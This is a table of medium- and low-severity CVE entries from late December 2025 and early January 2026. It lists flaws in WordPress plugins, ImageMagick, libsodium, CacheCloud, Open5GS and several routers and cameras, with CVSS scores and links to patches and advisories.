| Themesawesome--History Timeline | Missing Authorization vulnerability in Themesawesome History Timeline allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects History Timeline: from n/a through 1.0.6. | 2025-12-31 | 4.3 | CVE-2025-62150 | https://vdp.patchstack.com/database/wordpress/plugin/timeline-awesome/vulnerability/wordpress-history-timeline-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| Recorp--AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One | Missing Authorization vulnerability in Recorp AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI Content Writing Assistant (Content Writer, ChatGPT, Image Generator) All in One: from n/a through 1.1.7. | 2025-12-31 | 4.3 | CVE-2025-62154 | https://vdp.patchstack.com/database/wordpress/plugin/ai-content-writing-assistant/vulnerability/wordpress-ai-content-writing-assistant-content-writer-chatgpt-image-generator-all-in-one-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| Extend Themes--Vireo | Missing Authorization vulnerability in Extend Themes Vireo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Vireo: from n/a through 1.0.24. | 2025-12-31 | 4.3 | CVE-2025-62751 | https://vdp.patchstack.com/database/wordpress/theme/vireo/vulnerability/wordpress-vireo-theme-1-0-24-broken-access-control-vulnerability?_s_id=cve |
| Alexander--AnyComment | Missing Authorization vulnerability in Alexander AnyComment allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AnyComment: from n/a through 0.3.6. | 2025-12-31 | 4.3 | CVE-2025-62874 | https://vdp.patchstack.com/database/wordpress/plugin/anycomment/vulnerability/wordpress-anycomment-plugin-0-3-6-broken-access-control-vulnerability?_s_id=cve |
| Skynet Technologies USA LLC--All in One Accessibility | Missing Authorization vulnerability in Skynet Technologies USA LLC All in One Accessibility allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects All in One Accessibility: from n/a through 1.14. | 2025-12-31 | 4.3 | CVE-2025-63004 | https://vdp.patchstack.com/database/wordpress/plugin/all-in-one-accessibility/vulnerability/wordpress-all-in-one-accessibility-plugin-1-14-broken-access-control-vulnerability?_s_id=cve |
| Serhii Pasyuk--Gmedia Photo Gallery | Cross-Site Request Forgery (CSRF) vulnerability in Serhii Pasyuk Gmedia Photo Gallery allows Cross Site Request Forgery.This issue affects Gmedia Photo Gallery: from n/a through 1.24.1. | 2025-12-31 | 4.3 | CVE-2025-63014 | https://vdp.patchstack.com/database/wordpress/plugin/grand-media/vulnerability/wordpress-gmedia-photo-gallery-plugin-1-24-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Northern Beaches Websites--WP Custom Admin Interface | Missing Authorization vulnerability in Northern Beaches Websites WP Custom Admin Interface allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Custom Admin Interface: from n/a through 7.40. | 2025-12-31 | 4.3 | CVE-2025-63038 | https://vdp.patchstack.com/database/wordpress/plugin/wp-custom-admin-interface/vulnerability/wordpress-wp-custom-admin-interface-plugin-7-40-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--Post Snippets | Cross-Site Request Forgery (CSRF) vulnerability in Saad Iqbal Post Snippets allows Cross Site Request Forgery.This issue affects Post Snippets: from n/a through 4.0.11. | 2025-12-31 | 4.3 | CVE-2025-63040 | https://vdp.patchstack.com/database/wordpress/plugin/post-snippets/vulnerability/wordpress-post-snippets-plugin-4-0-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Crocoblock--JetPopup | Authorization Bypass Through User-Controlled Key vulnerability in Crocoblock JetPopup allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JetPopup: from n/a through 2.0.20.1. | 2025-12-29 | 4.3 | CVE-2025-68502 | https://vdp.patchstack.com/database/wordpress/plugin/jet-popup/vulnerability/wordpress-jetpopup-plugin-2-0-20-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| HETWORKS--WordPress Image shrinker | Server-Side Request Forgery (SSRF) vulnerability in HETWORKS WordPress Image shrinker allows Server Side Request Forgery.This issue affects WordPress Image shrinker: from n/a through 1.1.0. | 2025-12-29 | 4.9 | CVE-2025-68893 | https://vdp.patchstack.com/database/wordpress/plugin/wp-image-shrinker/vulnerability/wordpress-wordpress-image-shrinker-plugin-1-1-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-12, Magick fails to check for circular references between two MVGs, leading to a stack overflow. This is a DoS vulnerability, and any situation that allows reading the mvg file will be affected. Version 7.1.2-12 fixes the issue. | 2025-12-30 | 4 | CVE-2025-68950 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec |
| HemmeligOrg--Hemmelig.app | Hemmelig is a messing app with with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses but can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue. | 2025-12-29 | 4.3 | CVE-2025-69206 | https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5 https://github.com/HemmeligOrg/Hemmelig.app/commit/6c909e571d0797ee3bbd2c72e4eb767b57378228 |
| libsodium--libsodium | libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group. | 2025-12-31 | 4.5 | CVE-2025-69277 | https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae https://00f.net/2025/12/30/libsodium-vulnerability/ https://news.ycombinator.com/item?id=46435614 https://ianix.com/pub/ed25519-deployment.html |
| makeplane--plane | Plane is an an open-source project management tool. In plane.io, a guest user doesn't have a permission to access https[:]//app[.]plane[.]so/[:]slug/settings. Prior to Plane version 1.2.0, a problem occurs when the `/api/workspaces/:slug/members/` is accessible by guest and able to list of users on a specific workspace that they joined. Since the `display_name` in the response is actually the handler of the email, a malicious guest can still identify admin users' email addresses. Version 1.2.0 fixes this issue. | 2026-01-02 | 4.3 | CVE-2025-69284 | https://github.com/makeplane/plane/security/advisories/GHSA-7qx6-6739-c7qr |
| code-projects--Content Management System | A security vulnerability has been detected in code-projects Content Management System 1.0. Impacted is an unknown function of the file /admin/edit_posts.php. The manipulation of the argument image leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-01-02 | 4.7 | CVE-2026-0566 | VDB-339378 | code-projects Content Management System edit_posts.php unrestricted upload VDB-339378 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729228 | Code-projects Content Management System v1.0 Arbitrary file upload vulnerability https://github.com/Limingqian123/CVE/issues/13 https://code-projects.org/ |
| yeqifu--warehouse | A security flaw has been discovered in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. Affected by this issue is the function createResponseEntity of the file warehouse\src\main\java\com\yeqifu\sys\common\AppFileUtils.java. The manipulation of the argument path results in path traversal. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. | 2026-01-02 | 4.3 | CVE-2026-0571 | VDB-339385 | yeqifu warehouse AppFileUtils.java createResponseEntity path traversal VDB-339385 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729331 | yeqifu warehouse aaf29962ba407d22d991781de28796ee7b4670e4 Arbitrary File Read https://github.com/5i1encee/Vul/blob/main/Arbitrary%20File%20Read%20Vulnerability%20in%20Project%20yeqifu%20warehouse.md https://github.com/5i1encee/Vul/blob/main/Arbitrary%20File%20Read%20Vulnerability%20in%20Project%20yeqifu%20warehouse.md#poc |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| elinicksic--Razgover | A security vulnerability has been detected in elinicksic Razgover up to db37dfc5c82f023a40f2f7834ded6633fb2b5262. This affects an unknown part of the file Chattify/send.php of the component Chat Message Handler. Such manipulation of the argument msg leads to cross site scripting. The attack may be performed from remote. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The name of the patch is 995dd89d0e3ec5522966724be23a5d58ca1bdac3. Applying a patch is advised to resolve this issue. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-31 | 3.5 | CVE-2019-25262 | VDB-338649 | elinicksic Razgover Chat Message send.php cross site scripting VDB-338649 | CTI Indicators (IOB, IOC, TTP, IOA) https://github.com/elinicksic/Razgover/commit/995dd89d0e3ec5522966724be23a5d58ca1bdac3 |
| SohuTV--CacheCloud | A vulnerability was identified in SohuTV CacheCloud up to 3.2.0. This affects the function index of the file src/main/java/com/sohu/cache/web/controller/ServerController.java. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15171 | VDB-338556 | SohuTV CacheCloud ServerController.java index cross site scripting VDB-338556 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716304 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/367 https://github.com/sohutv/cachecloud/issues/367#issue-3733551662 |
| SohuTV--CacheCloud | A security flaw has been discovered in SohuTV CacheCloud up to 3.2.0. This impacts the function preview of the file src/main/java/com/sohu/cache/web/controller/RedisConfigTemplateController.java. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15172 | VDB-338557 | SohuTV CacheCloud RedisConfigTemplateController.java preview cross site scripting VDB-338557 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716306 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/368 https://github.com/sohutv/cachecloud/issues/368#issue-3733556724 |
| SohuTV--CacheCloud | A weakness has been identified in SohuTV CacheCloud up to 3.2.0. Affected is the function advancedAnalysis of the file src/main/java/com/sohu/cache/web/controller/InstanceController.java. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15173 | VDB-338558 | SohuTV CacheCloud InstanceController.java advancedAnalysis cross site scripting VDB-338558 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716307 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/369 https://github.com/sohutv/cachecloud/issues/369#issue-3733560985 |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this vulnerability is the function doAppAuditList of the file src/main/java/com/sohu/cache/web/controller/AppManageController.java. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15174 | VDB-338559 | SohuTV CacheCloud AppManageController.java doAppAuditList cross site scripting VDB-338559 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716308 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/370 https://github.com/sohutv/cachecloud/issues/370#issue-3733566371 |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doAppList/appCommandAnalysis of the file src/main/java/com/sohu/cache/web/controller/AppController.java. Performing manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15175 | VDB-338560 | SohuTV CacheCloud AppController.java appCommandAnalysis cross site scripting VDB-338560 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716309 | SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716322 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/371 https://github.com/sohutv/cachecloud/issues/381 |
| n/a--GreenCMS | A vulnerability was found in GreenCMS up to 2.3. This affects an unknown part of the file /DataController.class.php of the component File Handler. Performing manipulation of the argument sqlFiles/zipFiles results in path traversal. The attack can be initiated remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-29 | 3.8 | CVE-2025-15187 | VDB-338572 | GreenCMS File DataController.class.php path traversal VDB-338572 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721387 | https://github.com/GreenCMS/GreenCMS Greencms v2.3 Arbitrary File Removal Submit #724836 | https://github.com/GreenCMS/GreenCMS Greencms V2.3 Arbitrary File Removal (Duplicate) Submit #725143 | Greencms https://github.com/GreenCMS/GreenCMS V2.3 arbitrary file deletion (Duplicate) https://github.com/ueh1013/VULN/issues/4 https://github.com/ueh1013/VULN/issues/5 |
| SohuTV--CacheCloud | A flaw has been found in SohuTV CacheCloud up to 3.2.0. The impacted element is the function redirectNoPower of the file src/main/java/com/sohu/cache/web/controller/WebResourceController.java. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15201 | VDB-338588 | SohuTV CacheCloud WebResourceController.java redirectNoPower cross site scripting VDB-338588 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716312 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/373 |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doMachineList/doPodList of the file src/main/java/com/sohu/cache/web/controller/MachineManageController.java. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15219 | VDB-338604 | SohuTV CacheCloud MachineManageController.java doPodList cross site scripting VDB-338604 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716318 | SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716319 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/377 https://github.com/sohutv/cachecloud/issues/378 |
| SohuTV--CacheCloud | A flaw has been found in SohuTV CacheCloud up to 3.2.0. This vulnerability affects the function index of the file src/main/java/com/sohu/cache/web/controller/AppDataMigrateController.java. This manipulation causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15221 | VDB-338606 | SohuTV CacheCloud AppDataMigrateController.java index cross site scripting VDB-338606 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716321 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/380 |
| CloudPanel--Community Edition | A security vulnerability has been detected in CloudPanel Community Edition up to 2.5.1. The affected element is an unknown function of the file /admin/users of the component HTTP Header Handler. Such manipulation of the argument Referer leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.5.2 is sufficient to fix this issue. Upgrading the affected component is recommended. | 2025-12-30 | 3.5 | CVE-2025-15241 | VDB-338631 | CloudPanel Community Edition HTTP Header users redirect VDB-338631 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725543 | CloudPanel CloudPanel Community Edition 2.5.1 URL Redirection to Untrusted Site ('Open Redirect') https://github.com/Stolichnayer/cloudpanel-open-redirect https://github.com/Stolichnayer/cloudpanel-open-redirect?tab=readme-ov-file#%EF%B8%8F-steps-to-reproduce https://github.com/cloudpanel-io/cloudpanel-ce/releases/tag/v2.5.2 |
| n/a--PHPEMS | A vulnerability was detected in PHPEMS up to 11.0. The impacted element is an unknown function of the component Coupon Handler. Performing manipulation results in race condition. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitability is regarded as difficult. The exploit is now public and may be used. | 2025-12-30 | 3.1 | CVE-2025-15242 | VDB-338632 | PHPEMS Coupon race condition VDB-338632 | CTI Indicators (IOB, IOC) Submit #725661 | PHPEMS <=11.0 Race Condition https://byebydoggy.github.io/post/2025/1229-phpems-coupon-recharge-race-condition-poc/ |
| n/a--PHPEMS | A vulnerability has been found in PHPEMS up to 11.0. This impacts an unknown function of the component Purchase Request Handler. The manipulation leads to race condition. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 3.7 | CVE-2025-15244 | VDB-338634 | PHPEMS Purchase Request race condition VDB-338634 | CTI Indicators (IOB, IOC) Submit #725727 | PHPEMS <=11.0 Race Condition https://byebydoggy.github.io/post/2025/1229-phpems-points-race-condition-poc/ |
| D-Link--DCS-850L | A vulnerability was found in D-Link DCS-850L 1.02.09. Affected is the function uploadfirmware of the component Firmware Update Service. The manipulation of the argument DownloadFile results in path traversal. The attack must originate from the local network. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 3.5 | CVE-2025-15245 | VDB-338635 | D-Link DCS-850L Firmware Update Service uploadfirmware path traversal VDB-338635 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725742 | D-Link DCS850L v1.02.09 Absolute Path Traversal https://tzh00203.notion.site/D-Link-DCS850L-v1-02-09-Path-Traversal-Vulnerability-in-Firmware-Update-2d8b5c52018a803abbc7e30e2858d084?source=copy_link https://www.dlink.com/ |
| sunhailin12315--product-review | A security flaw has been discovered in sunhailin12315 product-review 商品评价系统 up to 91ead6890b4065bb45b7602d0d73348e75cb4639. This affects an unknown part of the component Write a Review. Performing manipulation of the argument content results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. This product adopts a rolling release strategy to maintain continuous delivery The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15248 | VDB-338638 | sunhailin12315 product-review 商品评价系统 Write a Review cross site scripting VDB-338638 | CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/sunhailin12315/product-review/issues/ICK775 |
| zhujunliang3--work_platform | A weakness has been identified in zhujunliang3 work_platform up to 6bc5a50bb527ce27f7906d11ea6ec139beb79c31. This vulnerability affects unknown code of the component Content Handler. Executing manipulation can lead to cross site scripting. The attack may be performed from remote. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15249 | VDB-338639 | zhujunliang3 work_platform Content cross site scripting VDB-338639 | CTI Indicators (IOB, IOC, TTP) https://gitee.com/zhujunliang3/work_platform/issues/ICLUJ2 |
| Edimax--BR-6208AC | A weakness has been identified in Edimax BR-6208AC 1.02/1.03. Affected by this issue is the function formALGSetup of the file /goform/formALGSetup of the component Web-based Configuration Interface. This manipulation of the argument wlan-url causes open redirect. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 3.5 | CVE-2025-15258 | VDB-338648 | Edimax BR-6208AC Web-based Configuration formALGSetup redirect VDB-338648 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722446 | Edimax BR-6208AC V2_1.02 Open Redirect https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Open-Redirect-Vulnerability-in-Web-formALGSetup-handler-2d3b5c52018a80188e9ae30d3cc8c3d1?source=copy_link |
| n/a--EyouCMS | A vulnerability was detected in EyouCMS up to 1.7.7. The affected element is an unknown function of the file application/home/model/Ask.php of the component Ask Module. Performing manipulation of the argument content results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 3.5 | CVE-2025-15374 | VDB-339082 | EyouCMS Ask Module Ask.php cross site scripting VDB-339082 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718480 | EyouCMS 1.7.7 Cross Site Scripting https://note-hxlab.wetolink.com/share/LNickWiRaFiF https://note-hxlab.wetolink.com/share/LNickWiRaFiF#-span--strong-proof-of-concept---strong---span- |
| Uasoft--badaso | A security vulnerability has been detected in Uasoft badaso up to 2.9.7. Affected is the function forgetPassword of the file src/Controllers/BadasoAuthController.php of the component Token Handler. Such manipulation leads to weak password recovery. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 3.7 | CVE-2025-15398 | VDB-339207 | Uasoft badaso Token BadasoAuthController.php forgetPassword password recovery VDB-339207 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720129 | badaso 2.9.7 Cryptographically Weak PRNG https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq#-span--strong-step-1--trigger-password-reset-for-victim--strong---span- |
| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. Such manipulation leads to denial of service. The attack must be carried out locally. The exploit is publicly available and might be used. The name of the patch is 465273d13ba5d47b274c38c9d1b07f04859178a1. A patch should be applied to remediate this issue. | 2026-01-01 | 3.3 | CVE-2025-15417 | VDB-339339 | Open5GS GTPv2-C F-TEID s11-handler.c sgwc_s11_handle_create_session_request denial of service VDB-339339 | CTI Indicators (IOB, IOC, IOA) Submit #727616 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4203 https://github.com/open5gs/open5gs/issues/4203#issuecomment-3681643498 https://github.com/open5gs/open5gs/issues/4203#issue-3719257558 https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1 |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c of the component Bearer QoS IE Length Handler. Performing manipulation results in denial of service. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The patch is named 4e913d21f2c032b187815f063dbab5ebe65fe83a. To fix this issue, it is recommended to deploy a patch. | 2026-01-01 | 3.3 | CVE-2025-15418 | VDB-339340 | Open5GS Bearer QoS IE Length types.c ogs_gtp2_parse_bearer_qos denial of service VDB-339340 | CTI Indicators (IOB, IOC, IOA) Submit #728043 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4217 https://github.com/open5gs/open5gs/issues/4217#issuecomment-3690767105 https://github.com/open5gs/open5gs/issues/4217#issue-3759615968 https://github.com/open5gs/open5gs/commit/4e913d21f2c032b187815f063dbab5ebe65fe83a |
| n/a--Open5GS | A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. Executing a manipulation can lead to denial of service. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. This patch is called 5aaa09907e7b9e0a326265a5f08d56f54280b5f2. It is advisable to implement a patch to correct this issue. | 2026-01-02 | 3.3 | CVE-2025-15419 | VDB-339341 | Open5GS GTPv2-C Flow s5c-handler.c sgwc_s5c_handle_create_session_response denial of service VDB-339341 | CTI Indicators (IOB, IOC, IOA) Submit #728044 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4224 https://github.com/open5gs/open5gs/issues/4224#issuecomment-3698521008 https://github.com/open5gs/open5gs/issues/4224#issue-3766767406 https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2 |
| n/a--LigeroSmart | A vulnerability was found in LigeroSmart up to 6.1.24. This affects an unknown part of the component Environment Variable Handler. Performing manipulation of the argument REQUEST_URI results in cross site scripting. The attack may be initiated remotely. The exploit has been made public and could be used. Upgrading to version 6.1.26 and 6.3 is able to mitigate this issue. The patch is named 264ac5b2be5b3c673ebd8cb862e673f5d300d9a7. The affected component should be upgraded. | 2026-01-02 | 3.5 | CVE-2025-15437 | VDB-339364 | LigeroSmart Environment Variable cross site scripting VDB-339364 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729021 | LigeroSmart 6.1.24 Cross Site Scripting https://github.com/LigeroSmart/ligerosmart/issues/278 https://github.com/LigeroSmart/ligerosmart/issues/278#issuecomment-3675129508 https://github.com/LigeroSmart/ligerosmart/commit/264ac5b2be5b3c673ebd8cb862e673f5d300d9a7 https://github.com/LigeroSmart/ligerosmart/releases/tag/6.1.26 |
| KDE--messagelib | KDE messagelib before 25.11.90 ignores SSL errors for threatMatches:find in the Google Safe Browsing Lookup API (aka phishing API), which might allow spoofing of threat data. NOTE: this Lookup API is not contacted in the messagelib default configuration. | 2025-12-31 | 3.4 | CVE-2025-69412 | https://github.com/KDE/messagelib/compare/v25.11.80...v25.11.90 https://github.com/KDE/messagelib/commit/01adef0482bb3d5c817433db5208620c84a992b3 https://developers.google.com/safe-browsing/v4 https://developers.google.com/safe-browsing/v4/lookup-api |
| Campcodes--Complete Online Beauty Parlor Management System | A vulnerability was determined in Campcodes Complete Online Beauty Parlor Management System 1.0. This vulnerability affects unknown code of the file /admin/search-invoices.php. Executing manipulation of the argument searchdata can lead to cross site scripting. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 2.4 | CVE-2025-15188 | VDB-338573 | Campcodes Complete Online Beauty Parlor Management System search-invoices.php cross site scripting VDB-338573 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721868 | campcodes Complete Online Beauty Parlor Management System V1.0 Cross Site Scripting https://github.com/BUPT2025201/CVE/issues/1 https://www.campcodes.com/ |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. The affected element is the function getExceptionStatisticsByClient/getCommandStatisticsByClient/doIndex of the file src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 2.4 | CVE-2025-15200 | VDB-338587 | SohuTV CacheCloud AppClientDataShowController.java doIndex cross site scripting VDB-338587 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716311 | SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716323 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) Submit #716324 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/372 https://github.com/sohutv/cachecloud/issues/382 |
| SohuTV--CacheCloud | A vulnerability has been found in SohuTV CacheCloud up to 3.2.0. This affects the function taskQueueList of the file src/main/java/com/sohu/cache/web/controller/TaskController.java. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 2.4 | CVE-2025-15202 | VDB-338589 | SohuTV CacheCloud TaskController.java taskQueueList cross site scripting VDB-338589 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716313 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/374 |
| SohuTV--CacheCloud | A vulnerability was found in SohuTV CacheCloud up to 3.2.0. This impacts the function index of the file src/main/java/com/sohu/cache/web/controller/ResourceController.java. Performing manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 2.4 | CVE-2025-15203 | VDB-338590 | SohuTV CacheCloud ResourceController.java index cross site scripting VDB-338590 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716314 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/375 |
| SohuTV--CacheCloud | A vulnerability was determined in SohuTV CacheCloud up to 3.2.0. Affected is the function doQuartzList of the file src/main/java/com/sohu/cache/web/controller/QuartzManageController.java. Executing manipulation can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 2.4 | CVE-2025-15204 | VDB-338591 | SohuTV CacheCloud QuartzManageController.java doQuartzList cross site scripting VDB-338591 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716315 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/376 |
| Campcodes--Park Ticketing System | A vulnerability was found in Campcodes Park Ticketing System 1.0. The impacted element is the function save_pricing of the file admin_class.php. The manipulation of the argument name/ride results in cross site scripting. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-12-30 | 2.4 | CVE-2025-15214 | VDB-338599 | Campcodes Park Ticketing System admin_class.php save_pricing cross site scripting VDB-338599 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725104 | Campcodes Park Ticketing System v1.0 XSS Submit #728898 | campcodes Park Ticketing System V1.0 Cross Site Scripting (Duplicate) https://github.com/dobkill/CVE/issues/2 https://www.campcodes.com/ |
